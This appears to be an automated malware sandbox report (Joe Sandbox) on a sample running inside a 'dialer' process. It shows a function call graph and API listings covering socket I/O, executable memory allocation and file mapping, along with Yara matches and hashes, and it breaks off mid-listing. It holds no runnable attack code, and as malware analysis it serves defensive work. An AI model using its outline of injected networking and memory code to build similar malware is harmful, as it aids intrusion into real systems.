594a9c6 setsockopt 16814->16815 16817 594a9e1 16814->16817 16816 594a9ff WSAGetLastError 16815->16816 16815->16817 16816->16817 16817->16792 16820 594a5ea 16818->16820 16823 594a55b 16818->16823 16819 594a628 WSARecv 16819->16820 16821 594a6f2 WSAGetLastError 16819->16821 16820->16819 16824 594a671 16820->16824 16821->16824 16822 5949f64 8 API calls 16822->16823 16823->16792 16824->16822 16824->16823 16829 594a7cf 16825->16829 16826 594a80f 16828 594a81d 16826->16828 16830 594a816 CloseHandle 16826->16830 16827 594a808 UnregisterWait 16827->16826 16828->16793 16829->16826 16829->16827 16829->16828 16830->16828 16832 594a8f9 16831->16832 16837 594a8a7 16831->16837 16833 594a940 closesocket 16832->16833 16834 594a903 setsockopt 16832->16834 16835 594a953 16833->16835 16833->16837 16834->16833 16834->16837 16851 5949ca2 socket 16835->16851 16837->16792 16839 594beea 16838->16839 16840 594bfa0 memset WSARecvFrom 16839->16840 16844 594bf06 16839->16844 16842 594bff6 WSAGetLastError 16840->16842 16840->16844 16842->16844 16843 594c08f 16843->16792 16844->16843 16867 594bcf1 memset 16844->16867 16846 594b8b7 16845->16846 16847 594b8b0 16845->16847 16882 594b9e5 16846->16882 16878 594b8c1 16847->16878 16850 594b8b5 16850->16792 16852 5949d04 SetHandleInformation 16851->16852 16853 5949cdc 16851->16853 16854 5949d4f memset 16852->16854 16858 5949d13 16852->16858 16853->16837 16855 5949d6c 16854->16855 16856 5949d9c 16855->16856 16857 5949dbb GetLastError 16855->16857 16856->16853 16862 5949e38 RegisterWaitForSingleObject 16856->16862 16857->16856 16859 5949dc8 WSAGetLastError 16857->16859 16864 5949d3e closesocket 16858->16864 16860 5949dd2 WSAGetLastError 16859->16860 16861 5949dda WSAGetLastError 16859->16861 16863 5949dea 16860->16863 16861->16863 16862->16853 16865 5949df6 closesocket 16863->16865 16864->16853 16865->16853 16866 5949e09 CloseHandle 16865->16866 16866->16853 16868 594bd22 memset 16867->16868 16869 594bdee 16867->16869 16872 594bd80 16868->16872 16871 594be43 GetLastError 16869->16871 16877 594bd84 16869->16877 16873 594be50 WSAGetLastError 16871->16873 16871->16877 16874 594bdb6 GetLastError 16872->16874 16872->16877 16875 594be62 WSAGetLastError 16873->16875 16876 594be5a WSAGetLastError 16873->16876 16874->16877 16875->16877 16876->16877 16877->16843 16880 594b8d6 16878->16880 16879 594b9bb 16879->16850 16880->16879 16886 594b629 16880->16886 16883 594b9fa 16882->16883 16885 594ba96 16883->16885 16891 594b721 16883->16891 16885->16850 16887 594b642 memset 16886->16887 16889 594b2a0 7 API calls 16887->16889 16890 594b6e5 16889->16890 16890->16879 16892 594b737 QueueUserWorkItem 16891->16892 16894 594b792 16892->16894 16894->16885 16896 5949864 16895->16896 16898 594992f 16895->16898 16897 5949878 16896->16897 16896->16898 16900 59498c2 shutdown 16897->16900 16903 59498b5 16897->16903 16899 594994b closesocket 16898->16899 16898->16903 16909 5949957 16898->16909 16899->16909 16901 59498d8 WSAGetLastError 16900->16901 16900->16903 16901->16903 16902 59499dd 16902->16903 16905 59499f3 UnregisterWait 16902->16905 16906 59499fe 16902->16906 16903->16805 16904 59499d0 free 16904->16902 16905->16906 16906->16903 16907 5949a05 CloseHandle 16906->16907 16907->16903 16908 5949992 UnregisterWait 16908->16909 16909->16902 16909->16904 16909->16908 16910 59499ac CloseHandle 16909->16910 16911 59499ce 16909->16911 16910->16909 16911->16904 16913 5949551 16912->16913 16914 5948e62 GetTickCount 16913->16914 16915 5948da8 16913->16915 16914->16915 16915->16808 15185 5948aad SetErrorMode 15186 5948abd 15185->15186 15187 594ae89 WSAStartup 15186->15187 15202 594ac49 memset htons inet_addr 15187->15202 15189 594aeb8 15203 594ac90 memset htons 15189->15203 15192 594af01 getsockopt 15194 594af26 15192->15194 15195 594af30 closesocket 15192->15195 15193 594af39 WSAGetLastError 15196 594af45 15193->15196 15194->15195 15197 594af46 socket 15195->15197 15196->15197 15198 594af8b WSAGetLastError 15197->15198 15200 594af57 closesocket 15197->15200 15199 594af97 15198->15199 15200->15199 15202->15189 15206 594c4f1 15203->15206 15205 594acc9 socket 15205->15192 15205->15193 15207 594c51a 15206->15207 15208 594c4fb 15206->15208 15220 594c529 15207->15220 15209 594c500 15208->15209 15213 594c5f6 memset 15208->15213 15209->15205 15212 594c518 15212->15205 15216 594c61f 15213->15216 15214 594c646 strchr 15215 594c65c strchr 15214->15215 15214->15216 15215->15216 15216->15214 15217 594c747 15216->15217 15219 594c6e7 __cfltcvt 15216->15219 15218 594c529 strchr 15217->15218 15217->15219 15218->15219 15219->15212 15222 594c54e 15220->15222 15223 594c5c2 __cfltcvt 15220->15223 15221 594c553 strchr 15221->15222 15222->15221 15222->15223 15223->15212 16924 59444f8 16925 59443a6 7 API calls 16924->16925 16926 5944515 16925->16926 17073 5948dfb 17074 5948e04 17073->17074 17075 5948e0e 17073->17075 17076 5948e11 5 API calls 17074->17076 17076->17075 15224 594453e 15227 5944551 15224->15227 15228 594455b 15227->15228 15231 5949721 15228->15231 15230 594454f 15232 594973d 15231->15232 15233 594972d 15231->15233 15232->15233 15236 5949ef3 15232->15236 15233->15230 15238 5949f20 15236->15238 15237 5949762 15237->15230 15238->15237 15239 5949f56 15238->15239 15240 5949f49 CreateEventA 15238->15240 15242 5949f64 memset 15239->15242 15240->15239 15243 5949f91 memset 15242->15243 15245 5949fd5 15243->15245 15246 5949fdd WSARecv 15243->15246 15245->15246 15247 594a01f GetLastError 15246->15247 15248 5949fff 15246->15248 15247->15248 15249 594a02c WSAGetLastError 15247->15249 15252 594a07a RegisterWaitForSingleObject 15248->15252 15253 594a009 15248->15253 15250 594a036 WSAGetLastError 15249->15250 15251 594a03e WSAGetLastError 15249->15251 15250->15253 15251->15253 15252->15253 15253->15237 16927 5942d39 16929 5942d48 16927->16929 16928 5942d6e 16931 5942d71 16929->16931 16943 59439c1 16929->16943 16931->16928 16936 5941a2b 16931->16936 16934 5942d68 16951 5942dba 16934->16951 16957 5941b75 malloc 16936->16957 16938 5941a43 16959 594570f malloc 16938->16959 16940 5941a67 16962 5941bd9 malloc 16940->16962 16944 59439e5 __cfltcvt 16943->16944 16945 59439f1 memset getaddrinfo 16944->16945 16946 5942d62 16945->16946 16948 5943a2e __cfltcvt 16945->16948 16946->16931 16946->16934 16947 5943aa1 FreeAddrInfoW 16947->16946 16948->16947 16949 5943a57 16948->16949 16950 5943a8c htons 16948->16950 16949->16947 16950->16947 16953 5942dd8 16951->16953 16952 5942e28 16955 5949659 19 API calls 16952->16955 16956 5942e47 16952->16956 16953->16952 16954 5943c47 free 16953->16954 16954->16952 16955->16956 16956->16928 16958 5941b8f 16957->16958 16958->16938 16960 5945741 16959->16960 16961 594571f memset 16959->16961 16960->16940 16961->16960 16963 5941be9 16962->16963 16966 5941c20 16963->16966 16971 594419f 16966->16971 16969 5941a9d 16969->16928 16970 5941c6a free 16970->16969 16981 5944129 malloc 16971->16981 16973 59441b0 16974 5941c3a 16973->16974 16975 59441fd __cfltcvt 16973->16975 16976 59441c1 __cfltcvt 16973->16976 16974->16969 16974->16970 16987 594ad54 16975->16987 16976->16974 16991 594ad96 16976->16991 16979 59441f8 16979->16974 16980 5944263 42 API calls 16979->16980 16980->16974 16982 5944141 16981->16982 16983 5944154 16982->16983 16984 5944148 free 16982->16984 16995 5944164 malloc memset 16983->16995 16984->16973 16986 5944160 16986->16973 16988 594ad62 16987->16988 16990 594ad81 16987->16990 16988->16990 16997 594a0c0 16988->16997 16990->16979 16992 594ada4 16991->16992 16994 594adc4 16991->16994 16992->16994 17045 594a223 16992->17045 16994->16979 16996 5944186 16995->16996 16996->16986 16998 594a0e1 16997->16998 17003 594a0d8 16997->17003 16999 594a0fa 16998->16999 17008 594acdd 16998->17008 17001 594a12d memset 16999->17001 16999->17003 17012 594ae30 16999->17012 17005 594a16c 17001->17005 17003->16990 17005->17003 17006 594a1be GetLastError 17005->17006 17006->17003 17007 594a1cb WSAGetLastError 17006->17007 17007->17003 17009 594ace9 17008->17009 17011 594ad04 17008->17011 17009->17011 17015 5949a41 17009->17015 17011->16999 17043 594adf8 WSAIoctl 17012->17043 17018 5949a57 17015->17018 17017 5949a53 17017->17011 17019 5949a65 socket 17018->17019 17020 5949ace bind 17018->17020 17022 5949a8f SetHandleInformation 17019->17022 17023 5949a79 WSAGetLastError 17019->17023 17021 5949ae2 WSAGetLastError 17020->17021 17026 5949a7f 17020->17026 17021->17026 17024 5949a9e GetLastError 17022->17024 17025 5949ab8 17022->17025 17023->17026 17027 5949aad 17024->17027 17031 5949b02 ioctlsocket 17025->17031 17026->17017 17030 5949aaf closesocket 17027->17030 17029 5949ac7 17029->17020 17029->17030 17030->17026 17032 5949b3e CreateIoCompletionPort 17031->17032 17033 5949b28 WSAGetLastError 17031->17033 17034 5949b5a 17032->17034 17037 5949b60 17032->17037 17041 5949b2e 17033->17041 17035 5949b96 GetLastError 17034->17035 17034->17037 17035->17041 17036 5949bc3 17040 5949c32 _errno 17036->17040 17036->17041 17039 5949b87 SetFileCompletionNotificationModes 17037->17039 17042 5949b90 17037->17042 17038 5949bfb setsockopt _errno 17038->17036 17039->17042 17040->17041 17041->17029 17042->17036 17042->17038 17042->17041 17044 594a11d 17043->17044 17044->17001 17044->17003 17046 594a244 17045->17046 17055 594a23b 17045->17055 17047 594a25e 17046->17047 17056 594ad18 17046->17056 17049 594a291 memset 17047->17049 17050 594ae30 WSAIoctl 17047->17050 17047->17055 17052 594a2d0 17049->17052 17051 594a281 17050->17051 17051->17049 17051->17055 17053 594a322 GetLastError 17052->17053 17052->17055 17054 594a32f WSAGetLastError 17053->17054 17053->17055 17054->17055 17055->16994 17057 594ad24 17056->17057 17058 594ad40 17056->17058 17057->17058 17060 5949c8c 17057->17060 17058->17047 17061 5949a57 15 API calls 17060->17061 17062 5949c9e 17061->17062 17062->17058 17063 5949659 17064 5949668 17063->17064 17070 5949685 17063->17070 17065 59496f3 abort 17064->17065 17066 5949693 17064->17066 17067 594967e 17064->17067 17068 594968a 17064->17068 17064->17070 17069 594bac0 12 API calls 17066->17069 17071 594aa5b 5 API calls 17067->17071 17072 594bc6d closesocket 17068->17072 17069->17070 17071->17070 17072->17070 16916 594427f 16917 594428c 16916->16917 16918 594429a 16917->16918 16919 59442f5 8 API calls 16917->16919 16920 5943c47 free 16918->16920 16919->16918 16921 59442a8 16920->16921 16922 59442c2 19 API calls 16921->16922 16923 59442b4 16922->16923

                                                                                      Executed Functions

                                                                                      Function 05949F64 Relevance: 12.1, APIs: 8, Instructions: 122networkregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 05949F7B
                                                                                      • memset.MSVCRT ref: 05949FC7
                                                                                      • WSARecv.WS2_32(FFE0458D,00000000,00000001,?,00000000,059421F9,00000000), ref: 05949FF5
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 0594A01F
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 0594A02C
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 0594A036
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 0594A03E
                                                                                      • RegisterWaitForSingleObject.KERNEL32(05942219,30C48300,05949EAD,059421E9,000000FF,00000004), ref: 0594A088
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2020750497-0
                                                                                      • Opcode ID: 0a64cb8a126250f30a1502bfde67f5a83319afb9ebd883c22d0dc2fe9da33b52
                                                                                      • Instruction ID: 1e47c46287ac3ecfbcf8ebf7d6d8a825d763bf34f10d97b5689869f764280d24
                                                                                      • Opcode Fuzzy Hash: 0a64cb8a126250f30a1502bfde67f5a83319afb9ebd883c22d0dc2fe9da33b52
                                                                                      • Instruction Fuzzy Hash: CF419A31644604EFE721DF64C849FAABBF9FF06310F108A29E952E6590D774EA08CF91
                                                                                      Function 05949A57 Relevance: 10.6, APIs: 7, Instructions: 64networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • socket.WS2_32(00000010,00000001,00000000), ref: 05949A6C
                                                                                      • WSAGetLastError.WS2_32(?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949A79
                                                                                        • Part of subcall function 05949B02: ioctlsocket.WS2_32(0594AD04,8004667E,0594AD81), ref: 05949B1D
                                                                                        • Part of subcall function 05949B02: WSAGetLastError.WS2_32(?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010), ref: 05949B28
                                                                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949A94
                                                                                      • GetLastError.KERNEL32(?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949A9E
                                                                                      • closesocket.WS2_32(00000000), ref: 05949AB0
                                                                                      • bind.WS2_32(50A5A5A5,0594AD04,00000002), ref: 05949AD7
                                                                                      • WSAGetLastError.WS2_32(?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949AE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2417539845-0
                                                                                      • Opcode ID: fdc2722fd71fa259388d441b876251b8e8d16f3c44ba7cdde5be049254ec7d9c
                                                                                      • Instruction ID: 40abbd6a80e8cc87ad98bbaf2e213cf5c7af19003137b89ba156a7d63ff9fc00
                                                                                      • Opcode Fuzzy Hash: fdc2722fd71fa259388d441b876251b8e8d16f3c44ba7cdde5be049254ec7d9c
                                                                                      • Instruction Fuzzy Hash: B8119D31208600EBDB215F74EC0AF6B7FAABB42731F10462CF622A50E0DB71AC449F21
                                                                                      Function 032B02D4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167memoryfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 032B031C
                                                                                        • Part of subcall function 032B00A0: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032B00C9
                                                                                        • Part of subcall function 032B00A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032B0275
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 032B036E
                                                                                      • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032B03DD
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032B03FD
                                                                                      • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 032B0424
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 032B044C
                                                                                      • CloseHandle.KERNELBASE(?), ref: 032B0467
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000003.2576468383.00000000032B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_3_32b0000_dialer.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                      • String ID: ,
                                                                                      • API String ID: 3867569247-3772416878
                                                                                      • Opcode ID: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                                                                                      • Instruction ID: ce7cb0b5bc27983b470169f518ab46f91fc1a27f16cc0054d09480c891139d1f
                                                                                      • Opcode Fuzzy Hash: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                                                                                      • Instruction Fuzzy Hash: 1D51DE75910609EFCB11DFA5C884ADEBBB8FF08354F14C529F955A7240D770E985CB60
                                                                                      Function 05948AAD Relevance: 13.6, APIs: 9, Instructions: 99networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003), ref: 05948AB2
                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 0594AEA0
                                                                                        • Part of subcall function 0594AC49: memset.MSVCRT ref: 0594AC59
                                                                                        • Part of subcall function 0594AC49: htons.WS2_32(00000002), ref: 0594AC6A
                                                                                        • Part of subcall function 0594AC49: inet_addr.WS2_32(?), ref: 0594AC77
                                                                                        • Part of subcall function 0594AC90: memset.MSVCRT ref: 0594ACA0
                                                                                        • Part of subcall function 0594AC90: htons.WS2_32(?), ref: 0594ACB1
                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0594AEED
                                                                                      • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 0594AF1E
                                                                                      • closesocket.WS2_32(00000000), ref: 0594AF31
                                                                                      • WSAGetLastError.WS2_32 ref: 0594AF39
                                                                                      • socket.WS2_32(00000017,00000001,00000000), ref: 0594AF4E
                                                                                      • closesocket.WS2_32(00000000), ref: 0594AF83
                                                                                      • WSAGetLastError.WS2_32 ref: 0594AF8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Error$Lastclosesockethtonsmemsetsocket$ModeStartupgetsockoptinet_addr
                                                                                      • String ID:
                                                                                      • API String ID: 2777411211-0
                                                                                      • Opcode ID: bdb2f23ecabe28f3b1677ee2a96fdae00c97682a1c9e99406dcaf4d973bf4cd4
                                                                                      • Instruction ID: 797ba9ca8b6a71a94bbeaf6e12717ba0aec14445beed85086d3c205093aa9550
                                                                                      • Opcode Fuzzy Hash: bdb2f23ecabe28f3b1677ee2a96fdae00c97682a1c9e99406dcaf4d973bf4cd4
                                                                                      • Instruction Fuzzy Hash: 7831A9B1258305EBE220EE649C8EFAB7B9EFB85720F40061EF515971C0DB75AD089F61
                                                                                      Function 0594A387 Relevance: 10.7, APIs: 7, Instructions: 157networkregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 53 594a387-594a3c6 memset * 2 54 594a3de-594a3f9 WSASend 53->54 55 594a3c8-594a3db CreateEventA 53->55 56 594a44a-594a455 GetLastError 54->56 57 594a3fb-594a3ff 54->57 55->54 58 594a457-594a46b WSAGetLastError call 594ac0f 56->58 59 594a470-594a477 56->59 57->59 60 594a401-594a415 57->60 73 594a517-594a51b 58->73 62 594a484-594a498 59->62 63 594a479 59->63 64 594a417-594a41c 60->64 65 594a42d-594a445 60->65 70 594a4b0-594a4d0 62->70 71 594a49a-594a49f 62->71 69 594a47c-594a482 63->69 64->65 66 594a41e-594a425 64->66 67 594a50e-594a514 call 5949e85 65->67 66->65 72 594a427-594a42a 66->72 76 594a515 67->76 69->62 69->69 70->76 77 594a4d2-594a4eb RegisterWaitForSingleObject 70->77 71->70 75 594a4a1-594a4a8 71->75 72->65 75->70 80 594a4aa-594a4ad 75->80 76->73 77->76 78 594a4ed-594a4f7 77->78 82 594a4fd-594a504 78->82 83 594a4f9-594a4fb 78->83 80->70 86 594a509-594a50d 82->86 83->86 86->67
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0594A3AE
                                                                                      • memset.MSVCRT ref: 0594A3BA
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0594427C,00000000,00000000,05944237,00000000), ref: 0594A3CC
                                                                                      • WSASend.WS2_32(?,0594427C,?,00000000,00000000,00000010,00000000), ref: 0594A3F1
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0594A44A
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0594A457
                                                                                      • RegisterWaitForSingleObject.KERNEL32(00000048,?,0594A51C,00000000,000000FF,0000000C), ref: 0594A4E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastmemset$CreateEventObjectRegisterSendSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2712206520-0
                                                                                      • Opcode ID: 56a27ee1a7a4ad5a3f3570b18393f707ed9a947d50960297b859fc585c4e4e56
                                                                                      • Instruction ID: 55ba65321c3f2f7945dff7215107619c77814ed5425e0f5de3a47c99982d5cfe
                                                                                      • Opcode Fuzzy Hash: 56a27ee1a7a4ad5a3f3570b18393f707ed9a947d50960297b859fc585c4e4e56
                                                                                      • Instruction Fuzzy Hash: 62517EB1504A06AFD724CF24C984E66BBFAFF09358B00562DE95687A50D730FC59CF90
                                                                                      Function 05949B02 Relevance: 7.6, APIs: 5, Instructions: 94networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 107 5949b02-5949b26 ioctlsocket 108 5949b3e-5949b58 CreateIoCompletionPort 107->108 109 5949b28 WSAGetLastError 107->109 110 5949b63-5949b6d 108->110 111 5949b5a-5949b5e 108->111 112 5949b2e-5949b2f 109->112 116 5949b75-5949b7c 110->116 117 5949b6f 110->117 114 5949b96-5949b9e GetLastError 111->114 115 5949b60 111->115 113 5949b32-5949b39 call 594ac0f 112->113 125 5949be2-5949be5 113->125 114->113 115->110 119 5949bb4-5949bb8 116->119 120 5949b7e-5949b81 116->120 117->116 122 5949bca-5949bce 119->122 123 5949bba-5949bc8 call 5949bfb 119->123 120->119 124 5949b83-5949b85 120->124 127 5949be7-5949bee 122->127 128 5949bd0-5949be0 call 5949c32 122->128 123->122 123->125 124->119 129 5949b87-5949b8e SetFileCompletionNotificationModes 124->129 134 5949bf6-5949bfa 125->134 135 5949bf4 127->135 136 5949bf0 127->136 128->125 128->127 132 5949ba0-5949bab 129->132 133 5949b90-5949b94 129->133 132->119 139 5949bad-5949baf 132->139 133->119 135->134 136->135 139->112
                                                                                      APIs
                                                                                      • ioctlsocket.WS2_32(0594AD04,8004667E,0594AD81), ref: 05949B1D
                                                                                      • WSAGetLastError.WS2_32(?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010), ref: 05949B28
                                                                                      • CreateIoCompletionPort.KERNELBASE(0594AD04,19751710,0594AD04,00000000,?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53), ref: 05949B48
                                                                                      • SetFileCompletionNotificationModes.KERNEL32(0594AD04,00000003,?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53,0594AD04), ref: 05949B8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                                                                      • String ID:
                                                                                      • API String ID: 3397353003-0
                                                                                      • Opcode ID: cbcb82adbc461a3e00964df8989fc8805346c8653879fe55e2be1446c9e15501
                                                                                      • Instruction ID: 6a3b164e1c4885658b35556d482fd781b5dc0643e4e6c52c1419d16a88cbaee1
                                                                                      • Opcode Fuzzy Hash: cbcb82adbc461a3e00964df8989fc8805346c8653879fe55e2be1446c9e15501
                                                                                      • Instruction Fuzzy Hash: F1318171518205EBDB219E659C89F673BAEFF41294F144529FA43921C0EB70ED44CF61
                                                                                      Function 0594A0C0 Relevance: 4.6, APIs: 3, Instructions: 136COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 141 594a0c0-594a0d6 142 594a0e1-594a0e4 141->142 143 594a0d8-594a0dc 141->143 145 594a105-594a112 142->145 146 594a0e6-594a0f5 call 594acdd 142->146 144 594a1d5-594a1db call 594ac0f 143->144 154 594a1dc-594a1df 144->154 148 594a114-594a121 call 594ae30 145->148 149 594a12d-594a163 memset 145->149 151 594a0fa-594a0ff 146->151 148->149 157 594a123-594a128 148->157 156 594a16c-594a16e 149->156 151->145 151->154 158 594a21e-594a222 154->158 159 594a170-594a178 156->159 160 594a1be-594a1c9 GetLastError 156->160 164 594a1d2 157->164 161 594a1e1-594a1ef 159->161 162 594a17a-594a188 159->162 160->161 163 594a1cb-594a1d1 WSAGetLastError 160->163 167 594a207-594a21a 161->167 168 594a1f1-594a1f6 161->168 165 594a19d-594a1bc call 5949e85 162->165 166 594a18a-594a18c 162->166 163->164 164->144 171 594a21c 165->171 166->165 170 594a18e-594a195 166->170 167->171 168->167 169 594a1f8-594a1ff 168->169 169->167 173 594a201-594a204 169->173 170->165 174 594a197-594a19a 170->174 171->158 173->167 174->165
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ab7ae3f564c6ca089a087417e4eebc4dac5dc145463ca083a69173d88c6c3e2
                                                                                      • Instruction ID: aacfb45f51454ccb6085092e801a1dae4acb29310deb0cfbfcaf666891440575
                                                                                      • Opcode Fuzzy Hash: 2ab7ae3f564c6ca089a087417e4eebc4dac5dc145463ca083a69173d88c6c3e2
                                                                                      • Instruction Fuzzy Hash: 38418DB15442019FDB14CF25C884FA2B7BAFF49328F448569ED168F296EB31E845CFA0
                                                                                      Function 0594AA5B Relevance: 4.6, APIs: 3, Instructions: 119COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 176 594aa5b-594aa71 177 594aa97-594aa9c 176->177 178 594aa73-594aa78 176->178 181 594aa9e-594aaa2 177->181 182 594aaef-594aaf5 177->182 179 594aa86-594aa8f call 594ab98 178->179 180 594aa7a-594aa84 shutdown 178->180 179->182 194 594aa91-594aa95 179->194 180->182 181->182 186 594aaa4-594aaad call 594ab98 181->186 184 594aaf7-594ab00 182->184 185 594ab19-594ab1f 182->185 184->185 188 594ab02-594ab04 184->188 189 594ab21-594ab2a 185->189 190 594ab43-594ab48 185->190 186->182 202 594aaaf-594aab7 186->202 188->185 195 594ab06-594ab08 188->195 189->190 196 594ab2c-594ab2e 189->196 192 594ab57-594ab63 190->192 193 594ab4a-594ab53 closesocket 190->193 198 594ab65-594ab67 192->198 199 594ab69-594ab6c 192->199 193->192 194->182 195->185 200 594ab0a-594ab11 195->200 196->190 201 594ab30-594ab32 196->201 198->199 203 594ab6f-594ab7d 198->203 199->203 200->185 204 594ab13-594ab16 200->204 201->190 205 594ab34-594ab3b 201->205 202->182 206 594aab9-594aabb 202->206 207 594ab94-594ab97 203->207 208 594ab7f-594ab84 203->208 204->185 205->190 209 594ab3d-594ab40 205->209 210 594aabd-594aac8 206->210 208->207 211 594ab86-594ab91 208->211 209->190 212 594aade-594aaeb 210->212 213 594aaca-594aad1 210->213 211->207 212->210 215 594aaed-594aaee 212->215 213->212 214 594aad3-594aada closesocket 213->214 214->212 215->182
                                                                                      APIs
                                                                                      • shutdown.WS2_32(D7FF5605,00000001), ref: 0594AA7E
                                                                                      • closesocket.WS2_32(?), ref: 0594AAD4
                                                                                      • closesocket.WS2_32(D7FF5605), ref: 0594AB4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: closesocket$shutdown
                                                                                      • String ID:
                                                                                      • API String ID: 3079814495-0
                                                                                      • Opcode ID: 40455434e0ec4754dbb3a1779fb2bd6ee4852f256e5686d92bed9765dfbaccb3
                                                                                      • Instruction ID: fa6b78b2c1ac1772a6b0f0425b3156e7d7cfe1e20b41115fc7523aa5d5a299a1
